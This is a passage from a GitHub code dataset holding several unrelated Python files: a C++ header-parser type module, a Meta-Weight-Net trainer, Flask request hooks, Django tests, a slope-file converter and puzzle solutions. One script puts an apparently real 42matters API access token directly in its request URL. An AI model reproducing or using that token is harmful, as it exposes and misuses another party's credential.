Value]\n\n param_pack: bool = False\n\n\n@dataclass\nclass TemplateSpecialization:\n \"\"\"\n Contains the arguments of a template specialization\n\n .. code-block:: c++\n\n Foo\n ~~~~~~~~~~~\n\n \"\"\"\n\n args: typing.List[TemplateArgument]\n\n\n@dataclass\nclass FunctionType:\n \"\"\"\n A function type, currently only used in a function pointer\n\n .. note:: There can only be one of FunctionType or Type in a DecoratedType\n chain\n \"\"\"\n\n return_type: \"DecoratedType\"\n parameters: typing.List[\"Parameter\"]\n\n #: If a member function pointer\n # TODO classname: typing.Optional[PQName]\n\n #: Set to True if ends with ``...``\n vararg: bool = False\n\n #: True if function has a trailing return type (``auto foo() -> int``).\n #: In this case, the 'auto' return type is removed and replaced with\n #: whatever the trailing return type was\n has_trailing_return: bool = False\n\n noexcept: typing.Optional[Value] = None\n\n #: Only set if an MSVC calling convention (__stdcall, etc) is explictly\n #: specified.\n #:\n #: .. note:: If your code contains things like WINAPI, you will need to\n #: use a preprocessor to transform it to the appropriate\n #: calling convention\n msvc_convention: typing.Optional[str] = None\n\n\n@dataclass\nclass Type:\n \"\"\"\n A type with a name associated with it\n \"\"\"\n\n typename: PQName\n\n const: bool = False\n volatile: bool = False\n\n\n@dataclass\nclass Array:\n \"\"\"\n Information about an array. Multidimensional arrays are represented as\n an array of array.\n \"\"\"\n\n #: The type that this is an array of\n array_of: typing.Union[\"Array\", \"Pointer\", Type]\n\n #: Size of the array\n #:\n #: .. code-block:: c++\n #:\n #: int x[10];\n #: ~~\n size: typing.Optional[Value]\n\n\n@dataclass\nclass Pointer:\n \"\"\"\n A pointer\n \"\"\"\n\n #: Thing that this points to\n ptr_to: typing.Union[Array, FunctionType, \"Pointer\", Type]\n\n const: bool = False\n volatile: bool = False\n\n\n@dataclass\nclass Reference:\n \"\"\"\n A lvalue (``&``) reference\n \"\"\"\n\n ref_to: typing.Union[Array, FunctionType, Pointer, Type]\n\n\n@dataclass\nclass MoveReference:\n \"\"\"\n An rvalue (``&&``) reference\n \"\"\"\n\n moveref_to: typing.Union[Array, FunctionType, Pointer, Type]\n\n\n#: A type or function type that is decorated with various things\n#:\n#: .. note:: There can only be one of FunctionType or Type in a DecoratedType\n#: chain\nDecoratedType = typing.Union[Array, Pointer, MoveReference, Reference, Type]\n\n\n@dataclass\nclass TemplateNonTypeParam:\n \"\"\"\n\n .. code-block:: c++\n\n template \n ~~~~~\n\n template \n ~~~~~~~~~~~~~~~~~~~\n\n template \n ~~~~~~\n \"\"\"\n\n type: DecoratedType\n name: typing.Optional[str] = None\n default: typing.Optional[Value] = None\n\n #: Contains a ``...``\n param_pack: bool = False\n\n\n@dataclass\nclass TemplateTypeParam:\n \"\"\"\n\n .. code-block:: c++\n\n template \n ~~~~~~~~~~\n \"\"\"\n\n #: 'typename' or 'class'\n typekey: str\n\n name: typing.Optional[str] = None\n\n param_pack: bool = False\n\n default: typing.Optional[Value] = None\n\n #: A template-template param\n template: typing.Optional[\"TemplateDecl\"] = None\n\n\n#: A parameter for a template declaration\n#:\n#: .. code-block:: c++\n#:\n#: template \n#: ~~~~~~~~~~\nTemplateParam = typing.Union[TemplateNonTypeParam, TemplateTypeParam]\n\n\n@dataclass\nclass TemplateDecl:\n \"\"\"\n Template declaration for a function or class\n\n .. code-block:: c++\n\n template \n class Foo {};\n\n template \n T fn();\n\n \"\"\"\n\n params: typing.List[TemplateParam] = field(default_factory=list)\n\n\n@dataclass\nclass ForwardDecl:\n \"\"\"\n Represents a forward declaration of a user defined type\n \"\"\"\n\n typename: PQName\n template: typing.Optional[TemplateDecl] = None\n doxygen: typing.Optional[str] = None\n\n #: Set if this is a forward declaration of an enum and it has a base\n enum_base: typing.Optional[PQName] = None\n\n #: If within a class, the access level for this decl\n access: typing.Optional[str] = None\n\n\n@dataclass\nclass BaseClass:\n \"\"\"\n Base class declarations for a class\n \"\"\"\n\n #: access specifier for this base\n access: str\n\n #: possibly qualified type name for the base\n typename: PQName\n\n #: Virtual inheritance\n virtual: bool = False\n\n #: Contains a ``...``\n param_pack: bool = False\n\n\n@dataclass\nclass ClassDecl:\n \"\"\"\n A class is a user defined type (class/struct/union)\n \"\"\"\n\n typename: PQName\n\n bases: typing.List[BaseClass] = field(default_factory=list)\n template: typing.Optional[TemplateDecl] = None\n\n explicit: bool = False\n final: bool = False\n\n doxygen: typing.Optional[str] = None\n\n #: If within a class, the access level for this decl\n access: typing.Optional[str] = None\n\n @property\n def classkey(self) -> typing.Optional[str]:\n return self.typename.classkey\n\n\n@dataclass\nclass Parameter:\n \"\"\"\n A parameter of a function/method\n \"\"\"\n\n type: DecoratedType\n name: typing.Optional[str] = None\n default: typing.Optional[Value] = None\n param_pack: bool = False\n\n\n@dataclass\nclass Function:\n \"\"\"\n A function declaration, potentially with the function body\n \"\"\"\n\n #: Only constructors and destructors don't have a return type\n return_type: typing.Optional[DecoratedType]\n\n name: PQName\n parameters: typing.List[Parameter]\n\n #: Set to True if ends with ``...``\n vararg: bool = False\n\n doxygen: typing.Optional[str] = None\n\n constexpr: bool = False\n extern: typing.Union[bool, str] = False\n static: bool = False\n inline: bool = False\n\n #: If true, the body of the function is present\n has_body: bool = False\n\n #: True if function has a trailing return type (``auto foo() -> int``).\n #: In this case, the 'auto' return type is removed and replaced with\n #: whatever the trailing return type was\n has_trailing_return: bool = False\n\n template: typing.Optional[TemplateDecl] = None\n\n throw: typing.Optional[Value] = None\n noexcept: typing.Optional[Value] = None\n\n #: Only set if an MSVC calling convention (__stdcall, etc) is explictly\n #: specified.\n #:\n #: .. note:: If your code contains things like WINAPI, you will need to\n #: use a preprocessor to transform it to the appropriate\n #: calling convention\n msvc_convention: typing.Optional[str] = None\n\n\n@dataclass\nclass Method(Function):\n \"\"\"\n A method declaration, potentially with the method body\n \"\"\"\n\n access: str = \"\"\n\n const: bool = False\n volatile: bool = False\n\n #: ref-qualifier for this method, either lvalue (&) or rvalue (&&)\n #:\n #: .. code-block:: c++\n #:\n #: void foo() &&;\n #: ~~\n #:\n ref_qualifier: typing.Optional[str] = None\n\n constructor: bool = False\n explicit: bool = False\n default: bool = False\n deleted: bool = False\n\n destructor: bool = False\n\n pure_virtual: bool = False\n virtual: bool = False\n final: bool = False\n override: bool = False\n\n\n@dataclass\nclass Operator(Method):\n \"\"\"\n Represents an operator method\n \"\"\"\n\n #: The operator type (+, +=, etc).\n #:\n #: In the case of a conversion operator (such as 'operator bool'), this\n #: is the string \"conversion\" and the full Type is found in return_type\n operator: str = \"\"\n\n\n@dataclass\nclass FriendDecl:\n \"\"\"\n Represents a friend declaration -- friends can only be classes or functions\n \"\"\"\n\n cls: typing.Optional[ForwardDecl] = None\n\n fn: typing.Optional[Function] = None\n\n\n@dataclass\nclass Typedef:\n \"\"\"\n A typedef specifier. A unique typedef specifier is created for each alias\n created by the typedef.\n\n .. code-block:: c++\n\n typedef type name, *pname;\n\n \"\"\"\n\n #: The aliased type or function type\n #:\n #: .. code-block:: c++\n #:\n #: typedef type *pname;\n #: ~~~~~~\n type: typing.Union[DecoratedType, FunctionType]\n\n #: The alias introduced for the specified type\n #:\n #: .. code-block:: c++\n #:\n #: typedef type *pname;\n #: ~~~~~\n name: str\n\n #: If within a class, the access level for this decl\n access: typing.Optional[str] = None\n\n\n@dataclass\nclass Variable:\n \"\"\"\n A variable declaration\n \"\"\"\n\n name: PQName\n type: DecoratedType\n\n value: typing.Optional[Value] = None\n\n constexpr: bool = False\n extern: typing.Union[bool, str] = False\n static: bool = False\n inline: bool = False\n\n #: Can occur for a static variable for a templated class\n template: typing.Optional[TemplateDecl] = None\n\n doxygen: typing.Optional[str] = None\n\n\n@dataclass\nclass Field:\n \"\"\"\n A field of a class\n \"\"\"\n\n #: public/private/protected\n access: str\n\n type: DecoratedType\n name: typing.Optional[str] = None\n\n value: typing.Optional[Value] = None\n bits: typing.Optional[int] = None\n\n constexpr: bool = False\n mutable: bool = False\n static: bool = False\n\n doxygen: typing.Optional[str] = None\n\n\n@dataclass\nclass UsingDecl:\n \"\"\"\n .. code-block:: c++\n\n using NS::ClassName;\n \"\"\"\n\n typename: PQName\n\n #: If within a class, the access level for this decl\n access: typing.Optional[str] = None\n\n\n@dataclass\nclass UsingAlias:\n \"\"\"\n .. code-block:: c++\n\n using foo = int;\n\n template \n using VectorT = std::vector;\n\n \"\"\"\n\n alias: str\n type: DecoratedType\n\n template: typing.Optional[TemplateDecl] = None\n\n #: If within a class, the access level for this decl\n access: typing.Optional[str] = None\n","repo_name":"Iltri12/Korai","sub_path":"lib/cxxheaderparser/cxxheaderparser/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":14037,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"20462606256","text":"import os\nfrom gears.compilers import ExecCompiler\n\n\nSOURCE = '\\n'.join((\n \"(function() {\",\n \" var template = Handlebars.template,\",\n \" templates = Handlebars.templates = Handlebars.templates || {};\",\n \" templates['%(name)s'] = template(%(source)s);\",\n \"}).call(this);\"))\n\n\nclass HandlebarsCompiler(ExecCompiler):\n\n result_mimetype = 'application/javascript'\n executable = 'node'\n params = [os.path.join(os.path.dirname(__file__), 'compiler.js')]\n\n def __call__(self, asset):\n super(HandlebarsCompiler, self).__call__(asset)\n asset.processed_source = SOURCE % {\n 'name': asset.attributes.path_without_suffix,\n 'source': asset.processed_source,\n }\n","repo_name":"gears/gears-handlebars","sub_path":"gears_handlebars/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"21789290142","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\nT = int(input())\n\ndef bfs(a,b):\n q = deque([(a,'')])\n while q:\n num,result = q.popleft()\n\n if num == b:\n print(result)\n return\n\n D = (2*num)%10000\n if not dp[D]:\n q.append((D,result+'D'))\n dp[D] = True\n S = (num-1)%10000\n if not dp[S]:\n q.append((S,result+'S'))\n dp[S] = True\n L = (10 * num + (num // 1000)) % 10000\n if not dp[L]:\n q.append((L, result + \"L\"))\n dp[L] = True\n\n \n R = (num // 10 + (num % 10) * 1000) % 10000\n if not dp[R]:\n q.append((R, result + \"R\"))\n dp[R] = True\n\nfor _ in range(T):\n a,b = map(int,input().split())\n dp = [False] * 10000\n bfs(a,b)\n\n\n","repo_name":"supersfel/baekjoon","sub_path":"21~30단계/동적계획법과 최단거리 역추적/9019_DSLR2.py","file_name":"9019_DSLR2.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71430347478","text":"\"\"\"\nBased on code from newer implementation of Meta Weight Net paper\nhttps://arxiv.org/abs/1902.07379\nhttps://github.com/ShiYunyi/Meta-Weight-Net_Code-Optimization\n\n\"\"\"\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.nn.utils import clip_grad_norm_\nfrom copy import deepcopy\nfrom .default_dataset import TsDataset\nfrom model.base_models import *\n\nfrom model.ns_methods.meta_weight_net.meta import MetaSGD\nfrom model.ns_methods.meta_weight_net.model import MetaNetMLP\nfrom model.ns_model_wrappers.model_wrapper import ModelWrapper\n\n\nclass MetaWeightNet(ModelWrapper):\n def __init__(self, training_args, model_args, loss=F.mse_loss):\n self.model_args = model_args.copy()\n self.model_class = eval(self.model_args.pop('name'))\n\n self.meta_net = MetaNetMLP(\n hidden_size=training_args['meta_net_hidden_size'],\n num_layers=training_args['meta_net_num_layers']\n )\n\n self.loss = loss\n\n self.n_epochs = training_args['n_epochs']\n self.batch_size = training_args['batch_size']\n self.clip_grad = training_args['clip_grad']\n\n self.opt = optim.SGD\n self.lr = training_args['lr']\n self.opt_args = {\n 'lr': self.lr,\n 'weight_decay': training_args['wd'],\n 'momentum': training_args['momentum']\n }\n\n self.meta_opt = optim.Adam(self.meta_net.parameters(),\n lr=training_args['meta_lr'],\n weight_decay=training_args['meta_wd'])\n self.meta_interval = training_args['meta_interval']\n\n self.model = None\n return\n\n def fit(self, X_tr, y_tr, X_val, y_val):\n loader = DataLoader(TsDataset(X_tr, y_tr), batch_size=self.batch_size, shuffle=True)\n meta_loader = DataLoader(TsDataset(X_val, y_val), batch_size=self.batch_size, shuffle=True)\n meta_loader_iter = iter(meta_loader)\n\n validation_losses = np.array([np.inf])\n best_model = None\n\n model = self.model_class(self.model_args)\n opt = self.opt(model.parameters(), **self.opt_args)\n\n for epoch in range(self.n_epochs):\n\n for iteration, (X, y) in enumerate(loader):\n model.train()\n\n if (iteration + 1) % self.meta_interval == 0:\n pseudo_model = self.model_class(self.model_args)\n pseudo_model.load_state_dict(model.state_dict())\n pseudo_model.train()\n\n pseudo_outputs = pseudo_model(X)\n pseudo_loss_vector = self.loss(pseudo_outputs, y, reduction='none')\n pseudo_loss_vector_reshape = torch.reshape(pseudo_loss_vector, (-1, 1))\n pseudo_weight = self.meta_net(pseudo_loss_vector_reshape.data)\n pseudo_loss = torch.mean(pseudo_weight * pseudo_loss_vector_reshape)\n\n pseudo_grads = torch.autograd.grad(pseudo_loss, pseudo_model.parameters(), create_graph=True)\n\n pseudo_optimizer = MetaSGD(pseudo_model, pseudo_model.parameters(), lr=self.lr)\n pseudo_optimizer.load_state_dict(opt.state_dict())\n pseudo_optimizer.meta_step(pseudo_grads)\n\n del pseudo_grads\n\n try:\n meta_X, meta_y = next(meta_loader_iter)\n except StopIteration:\n meta_loader_iter = iter(meta_loader)\n meta_X, meta_y = next(meta_loader_iter)\n\n meta_outputs = pseudo_model(meta_X)\n meta_loss = self.loss(meta_outputs, meta_y)\n\n self.meta_opt.zero_grad()\n meta_loss.backward()\n self.meta_opt.step()\n\n outputs = model(X)\n loss_vector = self.loss(outputs, y, reduction='none')\n loss_vector_reshape = torch.reshape(loss_vector, (-1, 1))\n\n with torch.no_grad():\n weight = self.meta_net(loss_vector_reshape)\n\n loss = torch.mean(weight * loss_vector_reshape)\n\n opt.zero_grad()\n loss.backward()\n clip_grad_norm_(model.parameters(), self.clip_grad)\n opt.step()\n\n # Evaluate validation loss for ES\n model.eval()\n with torch.no_grad():\n val_loss = self.loss(model(X_val), y_val).item()\n if (val_loss < validation_losses).all():\n best_model = deepcopy(model)\n validation_losses = np.append(validation_losses, [val_loss])\n\n assert(best_model is not None)\n self.model = best_model\n\n def predict(self, x):\n assert(self.model is not None)\n self.model.eval()\n return self.model(x)\n\n def update(self, X_tr, y_tr, X_val, y_val):\n return\n\n def reset(self):\n self.model = None","repo_name":"stefanosbennett/tsds_aaai_24","sub_path":"model/ns_model_wrappers/meta_weight_net_wrapper.py","file_name":"meta_weight_net_wrapper.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"39852954869","text":"import pandas as pd\r\nimport requests\r\nimport openpyxl\r\nimport time\r\nfrom tkinter.filedialog import askopenfilename\r\nfrom collections import defaultdict\r\n\r\n\r\npath = str(askopenfilename())\r\n\r\ntry:\r\n wb = openpyxl.load_workbook(str(path))\r\nexcept FileNotFoundError:\r\n message = 'Укажите путь к таблице!'\r\nsheet = wb.worksheets[0]\r\naddress = []\r\n\r\nfor i in range(1, sheet.max_row):\r\n if sheet.cell(row=i, column=1).value is None:\r\n max_row = i - 1\r\n print(max_row)\r\n break\r\n else:\r\n max_row = sheet.max_row\r\n print(max_row)\r\n\r\nfor i in range(2, max_row + 1):\r\n address.append(str(sheet.cell(row=i, column=1).value))\r\n\r\n\r\nprint(address)\r\nprint('da')\r\ndescription = []\r\ndesc = defaultdict(list)\r\nprint(desc)\r\nfor i in range(0,len(address)):\r\n try:\r\n print(address[i])\r\n response = requests.get(\"https://data.42matters.com/api/v2.0/android/apps/lookup.json?p=\"+str(address[i])+\"&fields=similar&lang=en&access_token=1300b9852763b84f7ae8326465e62bbfba660c3c\")\r\n print(response.json())\r\n desc[str(address[i])]=[]\r\n for j in range(0,len(response.json()['similar'])):\r\n print(response.json()['similar'][0])\r\n description.append(response.json()['similar'][j])\r\n desc[address[i]].append(str(response.json()['similar'][j]))\r\n print(desc)\r\n except KeyError:\r\n time.sleep(10)\r\n print('KeyError: token is expired or app was deleted')\r\n print(print(response.json()))\r\n\r\nprint(desc)\r\n\r\nwb = openpyxl.load_workbook(str(path))\r\nsheet = wb.worksheets[0]\r\nfor i in range(0, len(address)):\r\n sheet.cell(row=i + 2, column=5).value = str(desc[address[i]])\r\nwb.save(str(path))\r\nprint('ok')\r\n\r\n","repo_name":"AdvDevBaf/Mytarger-GeoCoder-different_stuff","sub_path":"google_description.py","file_name":"google_description.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"30763953111","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 31 15:57:57 2022\r\n\r\n@author: mugalsamrat.dahal\r\n\"\"\"\r\nimport os\r\nimport glob\r\nimport pandas as pd\r\n#import numpy as np\r\n\r\n### Convert slope file into two different OFEs\r\n#readdir = \"F:\\\\WORK\\\\Project_2\\\\save\\\\Saved_watershed\\\\closing-marquetry\\\\wepp\\\\runs\"\r\n#writedir = \"F:\\\\WORK\\\\Project_2\\\\WEPPwatershed\\\\springflatcreek\\\\wepp\\\\runs\"\r\n\r\ndef convslps(readdir,writedir):\r\n os.chdir(readdir)\r\n #os.getcwd()\r\n \r\n slplist = glob.glob(\"*.slp\")\r\n \r\n def mysolfunct(x):\r\n b='w' in list(x)[1]\r\n return not b\r\n \r\n c=[mysolfunct(x) for x in slplist] \r\n \r\n from itertools import compress\r\n nslps=list(compress(slplist,c))\r\n \r\n def interpol(x1,x2,y1,y2,x):\r\n '''calculates interpolation using two points of x & y coordinates'''\r\n y = round(y1 + (x-x1)*((y2-y1)/(x2-x1)),4)\r\n return y \r\n \r\n \r\n for slopnm in nslps:\r\n \r\n m = open(slopnm, 'r')\r\n my = m.readlines()\r\n slplen = float(my[3].split(\" \")[1]) ## This is slope length\r\n nps = float(my[3].split(\" \")[0]) ## number of points in the slope\r\n slppnts = my[4].split(\", \")\r\n \r\n slppnt2 = list()\r\n for p in slppnts:\r\n t = p.split(\" \")\r\n for a in t:\r\n slppnt2.append(a) \r\n \r\n slppnt2.remove('')\r\n \r\n ldist=list()\r\n lslp = list()\r\n for n in range(0,(len(slppnt2)-1)):\r\n if n%2==0:\r\n ldist.append(slppnt2[n])\r\n lslp.append(slppnt2[n+1])\r\n \r\n \r\n slppnt3 = [list(x) for x in zip(ldist,lslp)]\r\n slparr = pd.DataFrame(slppnt3, columns=['dist', 'slope'])\r\n \r\n #### This part will find the minimum absolute value ###########\r\n diff = list()\r\n for v in ldist:\r\n s = abs(float(v) - 0.50)\r\n diff.append(s)\r\n ######################################################\r\n ####### Use the minimum value to identify the number in the middle\r\n for m in range(0,(len(diff)-1)):\r\n if diff[m]-min(diff)==0:\r\n minind = m\r\n break\r\n ############################################################\r\n ### Now use the middle value to create a middle slope point #######\r\n \r\n ldist = [round(float(i),4) for i in ldist]\r\n lslp = [round(float(i),4) for i in lslp]\r\n middis = 0.50\r\n mid_slop = interpol(ldist[minind], ldist[minind+1],lslp[minind], lslp[minind+1],middis)\r\n #############################\r\n \r\n ### join distance and slope values ###\r\n slppnt4 = [list(x) for x in zip(ldist,[str(i) for i in lslp])]\r\n \r\n ### separate ofe 1 and 2\r\n ##add midpoint values\r\n \r\n ###### Some times the point closest to minimum value can fall closer to \r\n ##### ofe 2, in that case there needs to be a guard\r\n ###so that value greater than 0.5 is not appenede to ofe 1\r\n \r\n \r\n if slppnt4[minind][0]>0.50:\r\n ofe1 = slppnt4[0:minind]\r\n ofe2 = slppnt4[minind:(len(ldist)+1)]\r\n minind = minind-1 ## if this condition is fulfill there is a new minind\r\n else:\r\n ofe1 = slppnt4[0:minind+1]\r\n ofe2 = slppnt4[(minind+1):(len(ldist)+1)]\r\n if ofe1[minind][0] < 0.50: ### If there is already a 0.50 than i dont have to append to the top ofe\r\n ofe1.append([0.50, str(mid_slop)])\r\n ofe2.insert(0, [0.50, str(mid_slop)])\r\n \r\n ### Need to change the distance from top values \r\n ##now that ofe is broken into 2\r\n ldistleno1 = [i[0]*slplen for i in ofe1]\r\n ldistleno1 = [str(round(i/(slplen/2),4)) for i in ldistleno1]\r\n np_ofe1 = len(ldistleno1)\r\n \r\n ldistleno2 = [i[0]*slplen for i in ofe2]\r\n ldistleno2 = [str(round(((i-(slplen/2))/(slplen/2)),4)) for i in ldistleno2]\r\n np_ofe2 = len(ldistleno2)\r\n \r\n joiner1 = \" \"\r\n joiner2 = \", \"\r\n \r\n #### dissolve the list and prepare for slope file\r\n \r\n newofe1 = [list(x) for x in zip(ldistleno1,[i[1] for i in ofe1])]\r\n newofe1 = joiner1.join([joiner2.join(i) for i in newofe1])\r\n newofe2 = [list(x) for x in zip(ldistleno2,[i[1] for i in ofe2])]\r\n newofe2 = joiner1.join([joiner2.join(i) for i in newofe2])\r\n \r\n npandlen_ofe1 = str(np_ofe1)+\" \"+str(round(slplen/2,4))+\"\\n\"\r\n npandlen_ofe2 = str(np_ofe2)+\" \"+str(round(slplen/2,4))+\"\\n\"\r\n \r\n my[1]='2\\n' ## change number of ofe paramter\r\n \r\n my[3] = npandlen_ofe1 ## change parameter slope length and points\r\n my[4] = newofe1+\"\\n\" ## replace new values\r\n my.append(npandlen_ofe2)\r\n my.append(newofe2)\r\n \r\n myfile = open(writedir+\"\\\\\"+slopnm, \"w+\")\r\n myfile.writelines(my)\r\n myfile.close()\r\n\r\n\r\n","repo_name":"memugal33/Hydrology_and_Erosion_WEPP","sub_path":"converttotwoOFEslope.py","file_name":"converttotwoOFEslope.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"30945356026","text":"from django.core.exceptions import ValidationError\nfrom django.test import TestCase\n\nfrom main.utils import extension, slugified_file_location, validate_file_ext\n\n\nclass NamedObject(object):\n def __init__(self, name):\n self.name = name\n\n\nclass UnnamedObject(object):\n def __str__(self):\n return 'unnamed object'\n\n\nclass MainUtilsTestCase(TestCase):\n\n def test_extension(self):\n for input, expected_output in [\n ('picture.png', 'png'),\n ('picture.of.me.png', 'png'),\n ('picture', None),\n (None, None),\n (True, None),\n (1, None),\n (object, None),\n ]:\n self.assertEqual(extension(input), expected_output)\n\n def test_slugified_file_location(self):\n for instance, filename, expected_output in [\n (NamedObject('mnl video'), 'cLoaG.mov', 'av/mnl-video.mov'),\n (NamedObject('mnl audio'), 'NCu2H.mp3', 'av/mnl-audio.mp3'),\n (NamedObject('mnl image'), 'wo3BD.png', 'img/mnl-image.png'),\n (NamedObject('mnl doc'), 'Bhp1j.pdf', 'doc/mnl-doc.pdf'),\n (UnnamedObject(), 'FAF1I.docx', 'doc/unnamed-object.docx'),\n ]:\n self.assertEqual(\n slugified_file_location(instance, filename), expected_output)\n\n def test_validate_file_ext(self):\n for field, filename, allowed_exts in [\n ('logo', 'whalers.bmp', ['png', 'jpg']),\n ('goal_horn', 'whalers.ogg', ['mp3',]),\n ('stats', 'fall-2020.csv', ['xlsx',]),\n ]:\n with self.assertRaises(ValidationError):\n validate_file_ext(field, filename, allowed_exts)\n","repo_name":"monday-night-lights/mnl-api","sub_path":"django/main/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"15990704455","text":"import time\nfrom htmlmin.main import minify\nfrom flask import request, current_app, g\nfrom app.classes.bashcolors import colors\n\ndef before_request():\n #print( \"Path: %s\" % request.path )\n #print( \"Script root: %s\" % request.script_root )\n #print( \"Base URL: %s\" % request.base_url )\n #print( \"URL: %s\" % request.url )\n #print( \"URL root: %s\" % request.url_root )\n remote_addr = request.remote_addr\n if remote_addr == \"\" or remote_addr == None:\n remote_addr = request.headers.getlist(\"X-Forwarded-For\")[0]\n\n validateRemoteIP( remote_addr )\n\n found = False\n for i in range( 0, len( current_app.config[ 'TRACKING_IGNORE_EXT' ])):\n if( current_app.config[ 'TRACKING_IGNORE_EXT' ][ i ] in request.path ):\n found = True\n if( not found ):\n current_app.logger.debug( colors.getDebug() + \"Inside Main->before_request | REMOTE ADDRESS = \" + remote_addr + \" | REQUEST ADDRESS = \" + request.path )\n\n current_app.config[ 'REQUEST_CORE_URL' ] = found\n g.start = time.time()\n \ndef teardown_request( error = None ):\n res = getattr( g, 'resource', None )\n if res is not None:\n res.release()\n \ndef after_request( response ):\n if( \"REQUEST_CORE_URL\" in current_app.config and not current_app.config[ 'REQUEST_CORE_URL' ]):\n current_app.logger.info( colors.getInfo() + \"Inside Main->returnResponse | app.after_request\" )\n if( request.is_xhr ):\n print( \"XHR request\" )\n if( current_app.config[ 'MINIFY_PAGE' ]):\n \tif response.content_type == u'text/html; charset=utf-8':\n \tresponse.set_data( minify( response.get_data( as_text = True ), remove_comments = True ))\n return response\n \ndef injectHeaders( response ):\n if( \"REQUEST_CORE_URL\" in current_app.config and not current_app.config[ 'REQUEST_CORE_URL' ]):\n try:\n requests, remaining, reset = map( int, g.view_limits )\n except( AttributeError, ValueError ):\n pass\n else:\n response.headers[ \"X-RateLimit-Remaining\" ] = remaining\n response.headers[ \"X-RateLimit-Limit\" ] = requests\n response.headers[ \"X-RateLimit-Reset\" ] = reset\n current_app.logger.debug( colors.getDebug() + \"Inside Main->injectHeaders | Response headers set with rate limiting\" )\n try:\n diff = 0\n if current_app.config[ \"DEBUG\" ]:\n if( g.start ):\n diff = str( time.time() - g.start )\n if( \"REQUEST_CORE_URL\" in current_app.config and not current_app.config[ 'REQUEST_CORE_URL' ]):\n current_app.logger.debug( colors.getDebug() + request.path + \" - Exec Time: %s\" % diff )\n response.headers[ \"X-Frame-Options\" ] = \"SAMEORIGIN\"\n response.headers[ \"X-Runtime\" ] = diff\n response.headers[ \"X-Powered-By\" ] = current_app.config[ \"APP_POWERED_BY\" ]\n response.headers[ \"X-XSS-Protection\" ] = \"1; mode=block\"\n response.headers[ \"X-Content-Type-Options\" ] = \"nosniff\"\n response.headers[ \"cache-control\" ] = current_app.config[ 'CACHE_HTTP_HEADER' ]\n response.headers[ \"content-length\" ] = len( response.response[ 0 ])\n except:\n # Remove app.logger to fix issue 0002\n pass\n return response\n\ndef validateRemoteIP( addr ):\n if( addr in current_app.config[ 'BLOCKED_IP' ]):\n raise RequestFromBlockedIP()","repo_name":"robjporter/PYTHON-APIServer-1","sub_path":"app/classes/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8167304817","text":"import sys\n\nclass MFuns:\n\n \"\"\"\n God of gamblers\n 时间限制:1000 ms | 内存限制:65535 KB\n 难度:5\n 描述\n Have you ever seen the movie \"God if gamblers\"?\n Yes, it's very exciting! You must be attracted by the deft skill of the god of gamblers.\n He can play the cards as he wish. The action of shuffling cards is extramely handsome.\n How I wish I had such a pair of hands! However, it will be only a dream forever.\n\n There is a popular method of shuffling cards. Suppose you have a stack of 2*n cards.\n Then mix the two stacks of cards uniformly. That is, the ith card of the original stack is placed in the p(i)th\n position of the new stack of the new stack where p(i) is a function defined like this:\n p(i) = 2 * i ( i <= n )\n p(i) = 2 * ( i - n ) - 1 ( i > n)\n Give you an inter n. Calculate the minimum positive number of shuffling that makes the cards have the same order\n the original stack.\n\n 输入\n A line containing an integer n whish is less than 10^9\n There are multiple test cases. Input will be terminated EOF\n 输出\n A line containing an integer which indicates the minimum positive number of shuffles.\n 样例输入\n 1\n 样例输出\n 2\n \"\"\"\n\n def shuffling_card(self):\n n = int(input(\"Input n:\"))\n s = list(range(1, 2 * n + 1))\n result = s.copy()\n count = 1\n\n self.shuffling(n, result)\n while not result == s:\n self.shuffling(n, result)\n count += 1\n print(count)\n\n def shuffling(self, n, result):\n for i in range(1, 2 * n + 1):\n if result[i - 1] <= n:\n result[i - 1] = 2 * result[i - 1]\n else:\n result[i - 1] = 2 * (result[i - 1] - n) - 1\n\n \"\"\"\n 蚂蚁的难题(六)\n 时间限制:1000 ms | 内存限制:65535 KB\n 难度:5\n 描述\n 经过一系列的训练,蚂蚁的烹饪手艺终于可以见人了。他烹饪了n盘食品,编号1~n,每一盘都有一个美味价值Ai。\n 现在他要选取不超过 k 盘并且任意两盘编号不能够相邻,送给好朋友PIAOYI品尝。因为上次的“试吃”事件让PIAOYI很不开心,\n 所以蚂蚁决定选取足够大的美味价值来向PIAOYI道歉。但是蚂蚁又不知道该选那些食品,请你帮帮他吧?\n \n 输入\n 有多组测试数据。\n 对于每组测试数:\n 第一行有两个数n,k(n<=100000, k <= n/2)分别代表蚂蚁烹饪了n盘食品,最多选取k盘.\n 第二行有n个数字 Ai (|Ai| <= 1000000)表示每一盘食品的美味价值。\n 输出\n 对于每组数据,输出蚂蚁能够选取的最大值。\n 样例输入\n 6 3 \n 100 1 -1 100 1 -1\n 样例输出\n 200\n \"\"\"\n\n def ant6(self):\n input1 = input(\"总盘数, 最多选取数量:\")\n limit = int(input1.split(\" \")[1])\n input2 = input(\"输入食品数据:\")\n food = input2.split(\" \")\n self.get_max_ai(food, limit)\n\n def get_max_ai(self, food, limit):\n print(\"Max Ai: \", self.find_ai(0, food, food, limit))\n\n def find_ai(self, ai_count, food, residue_list, limit):\n if len(residue_list) == 0 or limit <= 0:\n return ai_count\n\n ai_count_list = []\n limit_copy = 0\n for i in 